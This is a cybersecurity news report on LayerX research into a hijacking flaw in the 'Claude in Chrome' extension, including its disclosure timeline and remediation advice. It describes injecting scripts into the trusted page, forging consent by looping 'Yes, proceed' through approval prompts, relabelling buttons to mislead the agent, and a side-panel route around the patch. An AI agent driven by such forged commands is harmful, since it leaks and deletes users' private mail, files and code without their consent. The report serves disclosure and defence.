Claude Chrome Extension Flaw Steals Gmail & Drive Data
A catastrophic vulnerability has been identified within the “Claude in Chrome” extension, according to recent research. This flaw allows attackers to weaponize an otherwise harmless, zero-permission...
A catastrophic vulnerability has been identified within the “Claude in Chrome” extension, according to recent research. This flaw allows attackers to weaponize an otherwise harmless, zero-permission extension, enabling the complete hijacking of the trusted AI assistant.
Transform it into a malicious puppet that silently pillages private Gmail messages, restricted Google Drive documents, and secret GitHub repositories.
This terrifying blind spot exposes the dark side of the AI automation race, proving that when vendors recklessly stretch trust boundaries to speed things up, they leave our most sensitive digital vaults wide open to exploitation.

Claude’s Chrome Extension Vulnerability
The root cause is a systemic trust boundary violation tied to the extension’s manifest file.
The extension uses the externally_connectable setting to communicate with the main claude.ai Large Language Model (LLM). However, it only verifies the origin of the request (claude.ai) rather than the actual execution context.
JavaScript running on the claude.ai page, including scripts injected by malicious extensions with no declared permissions, can execute privileged commands on Claude.
Because the script runs within the trusted origin, Chrome’s security model is bypassed, and the attacker inherits the capabilities of the trusted AI assistant.
To weaponize this flaw, researchers created a minimal proof-of-concept extension that successfully bypassed Claude’s built-in guardrails using two primary techniques:
- Approval Looping: Claude enforces user confirmations for sensitive actions. Researchers bypassed this by programmatically forging user consent, repeatedly sending “Yes, proceed” to satisfy state-based confirmation prompts.
- Perception Manipulation: Claude’s decision-making relies heavily on visible text and the Document Object Model (DOM) structure.

Attackers dynamically modified the UI semantics, such as renaming a “Share” button to “Request feedback,” tricking the AI’s visual perception into executing restricted actions that it believed were benign.
Once hijacked, the AI acts as a “confused deputy.” LayerX demonstrated that attackers could extract private GitHub source code, share restricted Google Drive documents with external users, and summarize, forward, and delete a user’s recent Gmail messages.
Notably, this requires neither user interaction nor complex exploit chains.
LayerX reported the flaw to Anthropic on April 27, 2026. On May 6, 2026, Anthropic released version 1.0.70, which introduced explicit approval flows for standard browser actions.
However, researchers note this patch is incomplete because it focuses on a UI-based permission layer rather than fixing the underlying externally_connectable handler.
If the extension operates in “privileged” mode (Act without asking), the vulnerability remains fully exploitable.
Furthermore, attackers can abuse the side-panel initialization flow to force a separate privileged-mode session, bypassing the newly introduced security checks entirely.
To properly remediate this trust model failure, LayerX recommends implementing strict validation of external message senders rather than relying on UI-based symptoms.
Recommended architectural changes include:
- Introducing extension-to-page authentication tokens, such as cryptographically signed requests, to verify sender identity.
- Restricting externally_connectable settings to trusted extension IDs rather than relying broadly on origin URLs.
- Binding user approvals strictly to specific actions using one-time tokens and non-replayable flows.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.